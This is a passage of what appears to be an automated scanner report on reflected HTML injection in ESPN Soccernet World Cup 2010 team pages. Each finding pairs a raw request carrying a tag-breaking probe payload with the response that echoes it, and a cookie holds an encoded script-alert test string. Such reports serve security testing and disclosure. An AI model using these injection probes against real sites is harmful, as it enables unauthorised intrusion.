Via: 8810-07/08
X-UA-Compatible: IE=EmulateIE7
Vary: Accept-Encoding
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>England Football / ...[SNIP]... <a href="/worldcup2010/team?team=448&_slug_=england139f9"><a>a59e25551c6&topId=805083&linktext=FA+confirms+Capello+will+stay+on"> ...[SNIP]...
2.72. http://soccernet.espn.go.com/worldcup2010/team/_/team/448/england [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Firm
Host: http://soccernet.espn.go.com
Path: /worldcup2010/team/_/team/448/england
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d6170"><a>7607dfaf4a2 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /worldcup2010/team/_/team/448/england?d6170"><a>7607dfaf4a2=1 HTTP/1.1
Host: soccernet.espn.go.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TSC=1; fsr.s=%7B%22v%22%3A1%2C%22rid%22%3A%221289019231707_594159%22%2C%22ru%22%3A%22http%3A%2F%2Finsider.espn.go.com%2Finsider%2Frumorcentral%3F39322%2522%253E%253Cscript%253Ealert(1)%253C%2Fscript%253E526b434719f%3D%22%2C%22r%22%3A%22insider.espn.go.com%22%2C%22st%22%3A%22%22%2C%22pv%22%3A3%2C%22to%22%3A5%2C%22c%22%3A%22http%3A%2F%2Fsoccernet.espn.go.com%2Fworldcup%2F%22%2C%22lc%22%3A%7B%22d0%22%3A%7B%22v%22%3A3%2C%22s%22%3Afalse%7D%7D%2C%22cd%22%3A0%2C%22sd%22%3A0%2C%22f%22%3A1289019278268%7D; jt_time=1289020630363; s_sess=%20s_ppv%3D83%3B%20s_cc%3Dtrue%3B%20s_omni_lid%3D%3B%20s_sq%3D%3B; fsr.a=1289020662234; CRBLM_LAST_UPDATE=1289020821; lang=en; userAB=7; soccerNetIndex=true; mbox=session#1289020509579-435223#1289022520|check#true#1289020720; broadbandAccess=espn3-false%2Cnetworks-false; DE2=dXNhO3R4O2hvdXN0b247YnJvYWRiYW5kOzU7NDszOzYxODswMjkuNzYzOy0wOTUuMzYzOzg0MDs0NDsxODs2O3VzOw==; s_pers=%20s_c24%3D1289020630042%7C1383628630042%3B%20s_c24_s%3DFirst%2520Visit%7C1289022430042%3B%20s_gpv_pn%3Dsoccernet%253Aworldcup2010%253Aindex%7C1289022430076%3B; espn360=false; RegTrackX=/insider/news/rumor central - mlb|local|not specified|not specified; DS=dGhlcGxhbmV0LmNvbTs3MzczMDQ7dGhlcGxhbmV0LmNvbSBpbnRlcm5ldCBzZXJ2aWNlcyBpbmMuOw==; s_vi=[CS]v1|266A6FBD05013105-60000110E0002F8F[CE]; worldcupversion=us; CP=null*; CRBLM=CBLM-001:; AcceptCookies=yes; COREG=5901; SWID=53406FAA-0429-45ED-9ACF-3C114582784B; SEEN2=cAMLBtEO:;
Response
HTTP/1.1 200 OK
Cache-Control: max-age=300
Date: Sat, 06 Nov 2010 23:07:48 GMT
Content-Type: text/html; charset=iso-8859-1
Last-Modified: Sat, 06 Nov 2010 23:07:48 GMT
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE"
From: ESPN20
Cache-Expires: Sat, 06 Nov 2010 23:12:48 GMT
Content-Length: 80382
Connection: close
Via: 8810-07/08
X-UA-Compatible: IE=EmulateIE7
Vary: Accept-Encoding
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>England Football / ...[SNIP]... <a href="/worldcup2010/team?team=448&d6170"><a>7607dfaf4a2=1&_slug_=england&d6170"> ...[SNIP]...
The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7a26e"><a>ecad0508930 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /worldcup2010/team/_/team/449/netherlands7a26e"><a>ecad0508930 HTTP/1.1
Host: soccernet.espn.go.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TSC=1; fsr.s=%7B%22v%22%3A1%2C%22rid%22%3A%221289019231707_594159%22%2C%22ru%22%3A%22http%3A%2F%2Finsider.espn.go.com%2Finsider%2Frumorcentral%3F39322%2522%253E%253Cscript%253Ealert(1)%253C%2Fscript%253E526b434719f%3D%22%2C%22r%22%3A%22insider.espn.go.com%22%2C%22st%22%3A%22%22%2C%22pv%22%3A3%2C%22to%22%3A5%2C%22c%22%3A%22http%3A%2F%2Fsoccernet.espn.go.com%2Fworldcup%2F%22%2C%22lc%22%3A%7B%22d0%22%3A%7B%22v%22%3A3%2C%22s%22%3Afalse%7D%7D%2C%22cd%22%3A0%2C%22sd%22%3A0%2C%22f%22%3A1289019278268%7D; jt_time=1289020630363; s_sess=%20s_ppv%3D83%3B%20s_cc%3Dtrue%3B%20s_omni_lid%3D%3B%20s_sq%3D%3B; fsr.a=1289020662234; CRBLM_LAST_UPDATE=1289020821; lang=en; userAB=7; soccerNetIndex=true; mbox=session#1289020509579-435223#1289022520|check#true#1289020720; broadbandAccess=espn3-false%2Cnetworks-false; DE2=dXNhO3R4O2hvdXN0b247YnJvYWRiYW5kOzU7NDszOzYxODswMjkuNzYzOy0wOTUuMzYzOzg0MDs0NDsxODs2O3VzOw==; s_pers=%20s_c24%3D1289020630042%7C1383628630042%3B%20s_c24_s%3DFirst%2520Visit%7C1289022430042%3B%20s_gpv_pn%3Dsoccernet%253Aworldcup2010%253Aindex%7C1289022430076%3B; espn360=false; RegTrackX=/insider/news/rumor central - mlb|local|not specified|not specified; DS=dGhlcGxhbmV0LmNvbTs3MzczMDQ7dGhlcGxhbmV0LmNvbSBpbnRlcm5ldCBzZXJ2aWNlcyBpbmMuOw==; s_vi=[CS]v1|266A6FBD05013105-60000110E0002F8F[CE]; worldcupversion=us; CP=null*; CRBLM=CBLM-001:; AcceptCookies=yes; COREG=5901; SWID=53406FAA-0429-45ED-9ACF-3C114582784B; SEEN2=cAMLBtEO:;
Response
HTTP/1.1 200 OK
Cache-Control: max-age=300
Date: Sat, 06 Nov 2010 23:24:22 GMT
Content-Type: text/html; charset=iso-8859-1
Last-Modified: Sat, 06 Nov 2010 23:24:22 GMT
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE"
From: ESPN21
Cache-Expires: Sat, 06 Nov 2010 23:29:22 GMT
Content-Length: 81781
Connection: close
Via: 8810-09/10
X-UA-Compatible: IE=EmulateIE7
Vary: Accept-Encoding
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>Netherlands Footbal ...[SNIP]... <a href="/worldcup2010/team?team=449&_slug_=netherlands7a26e"><a>ecad0508930&topId=808125&linktext=Andres+Iniesta+fires+Spain+to+glory"> ...[SNIP]...
2.74. http://soccernet.espn.go.com/worldcup2010/team/_/team/449/netherlands [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Firm
Host: http://soccernet.espn.go.com
Path: /worldcup2010/team/_/team/449/netherlands
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload accaf"><a>fe1ec450d74 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /worldcup2010/team/_/team/449/netherlands?accaf"><a>fe1ec450d74=1 HTTP/1.1
Host: soccernet.espn.go.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TSC=1; fsr.s=%7B%22v%22%3A1%2C%22rid%22%3A%221289019231707_594159%22%2C%22ru%22%3A%22http%3A%2F%2Finsider.espn.go.com%2Finsider%2Frumorcentral%3F39322%2522%253E%253Cscript%253Ealert(1)%253C%2Fscript%253E526b434719f%3D%22%2C%22r%22%3A%22insider.espn.go.com%22%2C%22st%22%3A%22%22%2C%22pv%22%3A3%2C%22to%22%3A5%2C%22c%22%3A%22http%3A%2F%2Fsoccernet.espn.go.com%2Fworldcup%2F%22%2C%22lc%22%3A%7B%22d0%22%3A%7B%22v%22%3A3%2C%22s%22%3Afalse%7D%7D%2C%22cd%22%3A0%2C%22sd%22%3A0%2C%22f%22%3A1289019278268%7D; jt_time=1289020630363; s_sess=%20s_ppv%3D83%3B%20s_cc%3Dtrue%3B%20s_omni_lid%3D%3B%20s_sq%3D%3B; fsr.a=1289020662234; CRBLM_LAST_UPDATE=1289020821; lang=en; userAB=7; soccerNetIndex=true; mbox=session#1289020509579-435223#1289022520|check#true#1289020720; broadbandAccess=espn3-false%2Cnetworks-false; DE2=dXNhO3R4O2hvdXN0b247YnJvYWRiYW5kOzU7NDszOzYxODswMjkuNzYzOy0wOTUuMzYzOzg0MDs0NDsxODs2O3VzOw==; s_pers=%20s_c24%3D1289020630042%7C1383628630042%3B%20s_c24_s%3DFirst%2520Visit%7C1289022430042%3B%20s_gpv_pn%3Dsoccernet%253Aworldcup2010%253Aindex%7C1289022430076%3B; espn360=false; RegTrackX=/insider/news/rumor central - mlb|local|not specified|not specified; DS=dGhlcGxhbmV0LmNvbTs3MzczMDQ7dGhlcGxhbmV0LmNvbSBpbnRlcm5ldCBzZXJ2aWNlcyBpbmMuOw==; s_vi=[CS]v1|266A6FBD05013105-60000110E0002F8F[CE]; worldcupversion=us; CP=null*; CRBLM=CBLM-001:; AcceptCookies=yes; COREG=5901; SWID=53406FAA-0429-45ED-9ACF-3C114582784B; SEEN2=cAMLBtEO:;
Response
HTTP/1.1 200 OK
Cache-Control: max-age=300
Date: Sat, 06 Nov 2010 23:20:01 GMT
Content-Type: text/html; charset=iso-8859-1
Last-Modified: Sat, 06 Nov 2010 23:20:01 GMT
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE"
From: ESPN02
Cache-Expires: Sat, 06 Nov 2010 23:25:01 GMT
Content-Length: 81889
Connection: close
Via: 8810-07/08
X-UA-Compatible: IE=EmulateIE7
Vary: Accept-Encoding
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>Netherlands Footbal ...[SNIP]... <a href="/worldcup2010/team?team=449&accaf"><a>fe1ec450d74=1&_slug_=netherlands&accaf"> ...[SNIP]...
The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b1e3a"><a>0e9f0d0eed8 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /worldcup2010/team/_/team/451/south-koreab1e3a"><a>0e9f0d0eed8 HTTP/1.1
Host: soccernet.espn.go.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TSC=1; fsr.s=%7B%22v%22%3A1%2C%22rid%22%3A%221289019231707_594159%22%2C%22ru%22%3A%22http%3A%2F%2Finsider.espn.go.com%2Finsider%2Frumorcentral%3F39322%2522%253E%253Cscript%253Ealert(1)%253C%2Fscript%253E526b434719f%3D%22%2C%22r%22%3A%22insider.espn.go.com%22%2C%22st%22%3A%22%22%2C%22pv%22%3A3%2C%22to%22%3A5%2C%22c%22%3A%22http%3A%2F%2Fsoccernet.espn.go.com%2Fworldcup%2F%22%2C%22lc%22%3A%7B%22d0%22%3A%7B%22v%22%3A3%2C%22s%22%3Afalse%7D%7D%2C%22cd%22%3A0%2C%22sd%22%3A0%2C%22f%22%3A1289019278268%7D; jt_time=1289020630363; s_sess=%20s_ppv%3D83%3B%20s_cc%3Dtrue%3B%20s_omni_lid%3D%3B%20s_sq%3D%3B; fsr.a=1289020662234; CRBLM_LAST_UPDATE=1289020821; lang=en; userAB=7; soccerNetIndex=true; mbox=session#1289020509579-435223#1289022520|check#true#1289020720; broadbandAccess=espn3-false%2Cnetworks-false; DE2=dXNhO3R4O2hvdXN0b247YnJvYWRiYW5kOzU7NDszOzYxODswMjkuNzYzOy0wOTUuMzYzOzg0MDs0NDsxODs2O3VzOw==; s_pers=%20s_c24%3D1289020630042%7C1383628630042%3B%20s_c24_s%3DFirst%2520Visit%7C1289022430042%3B%20s_gpv_pn%3Dsoccernet%253Aworldcup2010%253Aindex%7C1289022430076%3B; espn360=false; RegTrackX=/insider/news/rumor central - mlb|local|not specified|not specified; DS=dGhlcGxhbmV0LmNvbTs3MzczMDQ7dGhlcGxhbmV0LmNvbSBpbnRlcm5ldCBzZXJ2aWNlcyBpbmMuOw==; s_vi=[CS]v1|266A6FBD05013105-60000110E0002F8F[CE]; worldcupversion=us; CP=null*; CRBLM=CBLM-001:; AcceptCookies=yes; COREG=5901; SWID=53406FAA-0429-45ED-9ACF-3C114582784B; SEEN2=cAMLBtEO:;
Response
HTTP/1.1 200 OK
Cache-Control: max-age=300
Date: Sat, 06 Nov 2010 23:29:10 GMT
Content-Type: text/html; charset=iso-8859-1
Last-Modified: Sat, 06 Nov 2010 23:29:10 GMT
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE"
From: ESPN33
Cache-Expires: Sat, 06 Nov 2010 23:34:10 GMT
Content-Length: 81932
Connection: close
Via: 8810-09/10
X-UA-Compatible: IE=EmulateIE7
Vary: Accept-Encoding
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>South Korea Footbal ...[SNIP]... <a href="/worldcup2010/team?team=451&_slug_=south-koreab1e3a"><a>0e9f0d0eed8&topId=792536&linktext=Huh+decides+not+to+renew+contract"> ...[SNIP]...
2.76. http://soccernet.espn.go.com/worldcup2010/team/_/team/451/south-korea [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Firm
Host: http://soccernet.espn.go.com
Path: /worldcup2010/team/_/team/451/south-korea
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 28a78"><a>ad6c5189518 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /worldcup2010/team/_/team/451/south-korea?28a78"><a>ad6c5189518=1 HTTP/1.1
Host: soccernet.espn.go.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TSC=1; fsr.s=%7B%22v%22%3A1%2C%22rid%22%3A%221289019231707_594159%22%2C%22ru%22%3A%22http%3A%2F%2Finsider.espn.go.com%2Finsider%2Frumorcentral%3F39322%2522%253E%253Cscript%253Ealert(1)%253C%2Fscript%253E526b434719f%3D%22%2C%22r%22%3A%22insider.espn.go.com%22%2C%22st%22%3A%22%22%2C%22pv%22%3A3%2C%22to%22%3A5%2C%22c%22%3A%22http%3A%2F%2Fsoccernet.espn.go.com%2Fworldcup%2F%22%2C%22lc%22%3A%7B%22d0%22%3A%7B%22v%22%3A3%2C%22s%22%3Afalse%7D%7D%2C%22cd%22%3A0%2C%22sd%22%3A0%2C%22f%22%3A1289019278268%7D; jt_time=1289020630363; s_sess=%20s_ppv%3D83%3B%20s_cc%3Dtrue%3B%20s_omni_lid%3D%3B%20s_sq%3D%3B; fsr.a=1289020662234; CRBLM_LAST_UPDATE=1289020821; lang=en; userAB=7; soccerNetIndex=true; mbox=session#1289020509579-435223#1289022520|check#true#1289020720; broadbandAccess=espn3-false%2Cnetworks-false; DE2=dXNhO3R4O2hvdXN0b247YnJvYWRiYW5kOzU7NDszOzYxODswMjkuNzYzOy0wOTUuMzYzOzg0MDs0NDsxODs2O3VzOw==; s_pers=%20s_c24%3D1289020630042%7C1383628630042%3B%20s_c24_s%3DFirst%2520Visit%7C1289022430042%3B%20s_gpv_pn%3Dsoccernet%253Aworldcup2010%253Aindex%7C1289022430076%3B; espn360=false; RegTrackX=/insider/news/rumor central - mlb|local|not specified|not specified; DS=dGhlcGxhbmV0LmNvbTs3MzczMDQ7dGhlcGxhbmV0LmNvbSBpbnRlcm5ldCBzZXJ2aWNlcyBpbmMuOw==; s_vi=[CS]v1|266A6FBD05013105-60000110E0002F8F[CE]; worldcupversion=us; CP=null*; CRBLM=CBLM-001:; AcceptCookies=yes; COREG=5901; SWID=53406FAA-0429-45ED-9ACF-3C114582784B; SEEN2=cAMLBtEO:;
Response
HTTP/1.1 200 OK
Cache-Control: max-age=300
Date: Sat, 06 Nov 2010 23:27:28 GMT
Content-Type: text/html; charset=iso-8859-1
Last-Modified: Sat, 06 Nov 2010 23:27:28 GMT
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE"
From: ESPN03
Cache-Expires: Sat, 06 Nov 2010 23:32:28 GMT
Content-Length: 82040
Connection: close
Via: 8810-09/10
X-UA-Compatible: IE=EmulateIE7
Vary: Accept-Encoding
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>South Korea Footbal ...[SNIP]... <a href="/worldcup2010/team?team=451&28a78"><a>ad6c5189518=1&_slug_=south-korea&28a78"> ...[SNIP]...
The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5bf60"><a>27f1ff77858 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /worldcup2010/team/_/team/455/greece5bf60"><a>27f1ff77858 HTTP/1.1
Host: soccernet.espn.go.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TSC=1; fsr.s=%7B%22v%22%3A1%2C%22rid%22%3A%221289019231707_594159%22%2C%22ru%22%3A%22http%3A%2F%2Finsider.espn.go.com%2Finsider%2Frumorcentral%3F39322%2522%253E%253Cscript%253Ealert(1)%253C%2Fscript%253E526b434719f%3D%22%2C%22r%22%3A%22insider.espn.go.com%22%2C%22st%22%3A%22%22%2C%22pv%22%3A3%2C%22to%22%3A5%2C%22c%22%3A%22http%3A%2F%2Fsoccernet.espn.go.com%2Fworldcup%2F%22%2C%22lc%22%3A%7B%22d0%22%3A%7B%22v%22%3A3%2C%22s%22%3Afalse%7D%7D%2C%22cd%22%3A0%2C%22sd%22%3A0%2C%22f%22%3A1289019278268%7D; jt_time=1289020630363; s_sess=%20s_ppv%3D83%3B%20s_cc%3Dtrue%3B%20s_omni_lid%3D%3B%20s_sq%3D%3B; fsr.a=1289020662234; CRBLM_LAST_UPDATE=1289020821; lang=en; userAB=7; soccerNetIndex=true; mbox=session#1289020509579-435223#1289022520|check#true#1289020720; broadbandAccess=espn3-false%2Cnetworks-false; DE2=dXNhO3R4O2hvdXN0b247YnJvYWRiYW5kOzU7NDszOzYxODswMjkuNzYzOy0wOTUuMzYzOzg0MDs0NDsxODs2O3VzOw==; s_pers=%20s_c24%3D1289020630042%7C1383628630042%3B%20s_c24_s%3DFirst%2520Visit%7C1289022430042%3B%20s_gpv_pn%3Dsoccernet%253Aworldcup2010%253Aindex%7C1289022430076%3B; espn360=false; RegTrackX=/insider/news/rumor central - mlb|local|not specified|not specified; DS=dGhlcGxhbmV0LmNvbTs3MzczMDQ7dGhlcGxhbmV0LmNvbSBpbnRlcm5ldCBzZXJ2aWNlcyBpbmMuOw==; s_vi=[CS]v1|266A6FBD05013105-60000110E0002F8F[CE]; worldcupversion=us; CP=null*; CRBLM=CBLM-001:; AcceptCookies=yes; COREG=5901; SWID=53406FAA-0429-45ED-9ACF-3C114582784B; SEEN2=cAMLBtEO:;
Response
HTTP/1.1 200 OK
Cache-Control: max-age=300
Date: Sat, 06 Nov 2010 23:10:41 GMT
Content-Type: text/html; charset=iso-8859-1
Last-Modified: Sat, 06 Nov 2010 23:10:41 GMT
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE"
From: ESPN13
Cache-Expires: Sat, 06 Nov 2010 23:15:41 GMT
Content-Length: 82126
Connection: close
Via: 8810-07/08
X-UA-Compatible: IE=EmulateIE7
Vary: Accept-Encoding
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>Greece Football / S ...[SNIP]... <a href="/worldcup2010/team?team=455&_slug_=greece5bf60"><a>27f1ff77858&topId=766098&linktext=Rehhagel+steps+down+as+Greece+coach"> ...[SNIP]...
2.78. http://soccernet.espn.go.com/worldcup2010/team/_/team/455/greece [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Firm
Host: http://soccernet.espn.go.com
Path: /worldcup2010/team/_/team/455/greece
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a9866"><a>90f66760c97 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /worldcup2010/team/_/team/455/greece?a9866"><a>90f66760c97=1 HTTP/1.1
Host: soccernet.espn.go.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TSC=1; fsr.s=%7B%22v%22%3A1%2C%22rid%22%3A%221289019231707_594159%22%2C%22ru%22%3A%22http%3A%2F%2Finsider.espn.go.com%2Finsider%2Frumorcentral%3F39322%2522%253E%253Cscript%253Ealert(1)%253C%2Fscript%253E526b434719f%3D%22%2C%22r%22%3A%22insider.espn.go.com%22%2C%22st%22%3A%22%22%2C%22pv%22%3A3%2C%22to%22%3A5%2C%22c%22%3A%22http%3A%2F%2Fsoccernet.espn.go.com%2Fworldcup%2F%22%2C%22lc%22%3A%7B%22d0%22%3A%7B%22v%22%3A3%2C%22s%22%3Afalse%7D%7D%2C%22cd%22%3A0%2C%22sd%22%3A0%2C%22f%22%3A1289019278268%7D; jt_time=1289020630363; s_sess=%20s_ppv%3D83%3B%20s_cc%3Dtrue%3B%20s_omni_lid%3D%3B%20s_sq%3D%3B; fsr.a=1289020662234; CRBLM_LAST_UPDATE=1289020821; lang=en; userAB=7; soccerNetIndex=true; mbox=session#1289020509579-435223#1289022520|check#true#1289020720; broadbandAccess=espn3-false%2Cnetworks-false; DE2=dXNhO3R4O2hvdXN0b247YnJvYWRiYW5kOzU7NDszOzYxODswMjkuNzYzOy0wOTUuMzYzOzg0MDs0NDsxODs2O3VzOw==; s_pers=%20s_c24%3D1289020630042%7C1383628630042%3B%20s_c24_s%3DFirst%2520Visit%7C1289022430042%3B%20s_gpv_pn%3Dsoccernet%253Aworldcup2010%253Aindex%7C1289022430076%3B; espn360=false; RegTrackX=/insider/news/rumor central - mlb|local|not specified|not specified; DS=dGhlcGxhbmV0LmNvbTs3MzczMDQ7dGhlcGxhbmV0LmNvbSBpbnRlcm5ldCBzZXJ2aWNlcyBpbmMuOw==; s_vi=[CS]v1|266A6FBD05013105-60000110E0002F8F[CE]; worldcupversion=us; CP=null*; CRBLM=CBLM-001:; AcceptCookies=yes; COREG=5901; SWID=53406FAA-0429-45ED-9ACF-3C114582784B; SEEN2=cAMLBtEO:;
Response
HTTP/1.1 200 OK
Cache-Control: max-age=300
Date: Sat, 06 Nov 2010 23:08:55 GMT
Content-Type: text/html; charset=iso-8859-1
Last-Modified: Sat, 06 Nov 2010 23:08:55 GMT
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE"
From: ESPN11
Cache-Expires: Sat, 06 Nov 2010 23:13:54 GMT
Content-Length: 82234
Connection: close
Via: 8810-07/08
X-UA-Compatible: IE=EmulateIE7
Vary: Accept-Encoding
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>Greece Football / S ...[SNIP]... <a href="/worldcup2010/team?team=455&a9866"><a>90f66760c97=1&_slug_=greece&a9866"> ...[SNIP]...
The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6f1e2"><a>30af7f0b19c was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /worldcup2010/team/_/team/467/south-africa6f1e2"><a>30af7f0b19c HTTP/1.1
Host: soccernet.espn.go.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TSC=1; fsr.s=%7B%22v%22%3A1%2C%22rid%22%3A%221289019231707_594159%22%2C%22ru%22%3A%22http%3A%2F%2Finsider.espn.go.com%2Finsider%2Frumorcentral%3F39322%2522%253E%253Cscript%253Ealert(1)%253C%2Fscript%253E526b434719f%3D%22%2C%22r%22%3A%22insider.espn.go.com%22%2C%22st%22%3A%22%22%2C%22pv%22%3A3%2C%22to%22%3A5%2C%22c%22%3A%22http%3A%2F%2Fsoccernet.espn.go.com%2Fworldcup%2F%22%2C%22lc%22%3A%7B%22d0%22%3A%7B%22v%22%3A3%2C%22s%22%3Afalse%7D%7D%2C%22cd%22%3A0%2C%22sd%22%3A0%2C%22f%22%3A1289019278268%7D; jt_time=1289020630363; s_sess=%20s_ppv%3D83%3B%20s_cc%3Dtrue%3B%20s_omni_lid%3D%3B%20s_sq%3D%3B; fsr.a=1289020662234; CRBLM_LAST_UPDATE=1289020821; lang=en; userAB=7; soccerNetIndex=true; mbox=session#1289020509579-435223#1289022520|check#true#1289020720; broadbandAccess=espn3-false%2Cnetworks-false; DE2=dXNhO3R4O2hvdXN0b247YnJvYWRiYW5kOzU7NDszOzYxODswMjkuNzYzOy0wOTUuMzYzOzg0MDs0NDsxODs2O3VzOw==; s_pers=%20s_c24%3D1289020630042%7C1383628630042%3B%20s_c24_s%3DFirst%2520Visit%7C1289022430042%3B%20s_gpv_pn%3Dsoccernet%253Aworldcup2010%253Aindex%7C1289022430076%3B; espn360=false; RegTrackX=/insider/news/rumor central - mlb|local|not specified|not specified; DS=dGhlcGxhbmV0LmNvbTs3MzczMDQ7dGhlcGxhbmV0LmNvbSBpbnRlcm5ldCBzZXJ2aWNlcyBpbmMuOw==; s_vi=[CS]v1|266A6FBD05013105-60000110E0002F8F[CE]; worldcupversion=us; CP=null*; 